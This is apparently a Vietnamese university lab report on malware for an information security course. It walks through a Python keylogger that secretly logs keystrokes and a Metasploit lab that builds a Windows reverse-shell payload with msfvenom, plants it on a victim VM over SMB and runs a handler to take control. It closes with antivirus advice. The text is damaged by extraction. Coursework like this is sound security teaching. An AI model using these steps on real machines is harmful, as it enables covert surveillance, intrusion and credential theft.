Bài báo cáo thực hành môn An toàn thông tin LAB 06: Malware | Đại học Sư phạm Kỹ thuật Thành phố Hồ Chí Minh
Bài báo cáo thực hành môn An toàn thông tin LAB 06: Malware của Đại học Sư phạm Kỹ thuật Thành phố Hồ Chí Minh với những kiến thức và thông tin bổ ích giúp sinh viên tham khảo, ôn luyện và phục vụ nhu cầu học tập của mình cụ thể là có định hướng ôn tập, nắm vững kiến thức môn học và làm bài tốt trong những bài kiểm tra, bài tiểu luận, bài tập kết thúc học phần, từ đó học tập tốt và có kết quả cao cũng như có thể vận dụng tốt những kiến thức mình đã học vào thực tiễn cuộc sống. Mời bạn đọc đón xem!
Môn: An toàn thông tin (INSE330380)
Trường: Đại học Sư phạm Kỹ thuật Thành phố Hồ Chí Minh
Thông tin:
Tác giả:
Preview text:
lOMoARcPSD| 36086670 lOMoARcPSD| 36086670 PHẦN 1: KEYLOGGER
* Định nghĩa: Là một loại phần mềm hoặc thiết bị giám sát và ghi lại mọi phím ược ấn trên bàn
phím của máy tính mà nó ược cài ặt. Mục
ích chính của keylogger là theo dõi hoặc
ánh cắp thông tin mà người dùng nhập vào máy tính mà không ược họ biết. Keylogger
có thể sử dụng với các mục ích hợp pháp như việc theo dõi hoạt ộng của con cái hoặc nhân
viên trong môi trường công việc. Tuy nhiên, chúng cũng có thể ược sử dụng bởi tin tặc hoặc
người xấu ể ánh cắp thông tin cá nhân, mật khẩu, thông tin tài khoản ngân hàng, và nhiều thông tin quan trọng khác
* Thực hành: Xây dựng phần mềm theo dõi thao tác của người dùng trên bàn phím, từ ó
ánh cắp thông tin mà người dùng nhập qua bàn phím.
* Các bước thực hiện:
Bước 1: Trong ổ ĩa C tạo thư mục hack ể giấu phần mềm gián iệp
Bước 2: Sau ó ta sẽ ể file giandiep.py vào thư mục vừa tạo
Bước 3: Xây dựng file giandiep.py
Bước 3.1: Cài ặt thư viện pynput lOMoARcPSD| 36086670
Bước 3.2: Gọi thư viện gián iệp Listener ể theo dõi thao tác của người dùng trên
máy ở ây cụ thể là từ bàn phím
Bước 3.3: Xây dựng hàm gián iệp lấy thông tin các phím ược người dùng gõ rồi
ghi vào file giandiep.txt Giải thích:
1. Truyền vào tham số key - là phím trên bàn phím
2. Sau ó ép kiểu thành kiểu string ể ghi ược vào file .txt
3. Nếu người dùng bấm F10 thì chương trình gián iệp sẽ dừng lại
4. Nếu không phải phím F10 thì mở file giandiep.txt rồi ghi vào, nếu file chưa có
thìsẽ tạo mới rồi ghi thêm vào (tham số ‘a’ viết tắt của appending), truyền thêm tham
số encoding utf-8 ể người dùng có nhập Tiếng Việt thì phần mềm cũng hiểu mà ghi vào file
5. Sau ó viết phím key ã ép kiểu vào file, sau ó óng file
Bước 4: Chạy hàm ã ịnh nghĩa Giải thích: lOMoARcPSD| 36086670
1. Tạo ối tượng Listener truyền tham số key_press là hàm ã ịnh nghĩa ở trên
2. Dùng phương thức start() ể bắt ầu lắng nghe
3. Dùng phương thức join() ể duy trì quá trình, cho ến khi quá trình hoàn thành * Kết quả: PHẦN 2: MALWARE
Bước 1: Xem IP của máy Kali và máy Windows XP
Bước 1.1: Vào Command Prompt của Windows XP dùng lệnh ipconfig ể ịnh ịa chỉ IP của máy Windows XP.
Bước 1.2: Vào Terminal của Kali dùng lệnh ifconfig ể ịnh ịa chỉ IP của máy Kali. lOMoARcPSD| 36086670
Bước 2: Truy cập vào MSFConsole bằng lệnh msfconsole lOMoARcPSD| 36086670 1
Bước 3: Tạo virus có tên dev.exe, thực hiện ping kết nối 2 máy
Bước 3.1: Dùng lệnh msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.218.132 LPORT=4444 -f exe > /root/dev.exe. Trong ó:
192.168.218.132 là ịa chỉ ip của máy tính Attacker, 4444 là chỉ số port sẽ sử dụng kết nối với máy nạn nhân.
Bước 3.2: Kiểm tra trong file root của Windows XP, mở thư mục root với quyền
root, thấy thư mục dev.exe là virus mình tạo. lOMoARcPSD| 36086670
Bước 4: Phát tán virus Bước 4.1: Tạo thư mục 21110600_NTP lOMoARcPSD| 36086670
Bước 4.2: Cấu hình như sau
Bước 4.3: Máy Attacker, vào smb ể chuyển file sang máy nạn nhân
Bước 4.4: Kiểm tra virus dev.exe trong thư mục 21110600_NTP trên Windows XP lOMoARcPSD| 36086670
Bước 5: Khai thác máy nạn nhân - Dùng các lệnh
use exploit/multi/handler set payload
windows/meterpreter/reverse_tcp set LHOST
192.168.2.136 set LPORT 4444
- Sau ó dùng lệnh: exploit lOMoARcPSD| 36086670
Xem lệnh ang chạy bằng cú pháp ps lOMoARcPSD| 36086670
Tạo thư mục trên máy nạn nhân lOMoARcPSD| 36086670
Tạo user phân quyền trên máy nạn nhân
PHÒNG CHỐNG CÁC PHẦN MỀM ĐỘC HẠI
1. Cài ặt chương trình duyệt virus
2. Không chạy các chương trình lạ
* Cài ặt chương trình duyệt virus: lOMoARcPSD| 36086670
Hãy tải và cài ặt một phần mềm diệt virus mạnh mẽ và áng tin cậy. Các phần mềm
diệt virus phổ biến bao gồm Avast, McAfee, Norton, hoặc Bitdefender.
Hãy ảm bảo cập nhật thường xuyên ể bảo vệ trước các mối e dọa mới. Thiết lập
chương trình diệt virus ể quét toàn bộ hệ thống máy tính của bạn và các ổ ĩa cứng ịnh kỳ.
* Không chạy các chương trình lạ:
Hạn chế cài ặt các phần mềm từ nguồn không tin cậy. Chỉ cài ặt phần mềm từ các
nguồn áng tin cậy như trang web chính thức của nhà sản xuất hoặc cửa hàng ứng dụng chính thống.
Tránh mở tệp ính kèm từ email hoặc tin nhắn của người không quen biết. Hãy
luôn cập nhật hệ iều hành và các ứng dụng của bạn với phiên bản mới nhất ể
bảo vệ khỏi các lỗ hổng bảo mật ã ược vá.
Sử dụng tường lửa ể ngăn chặn các kết nối không mong muốn ến máy tính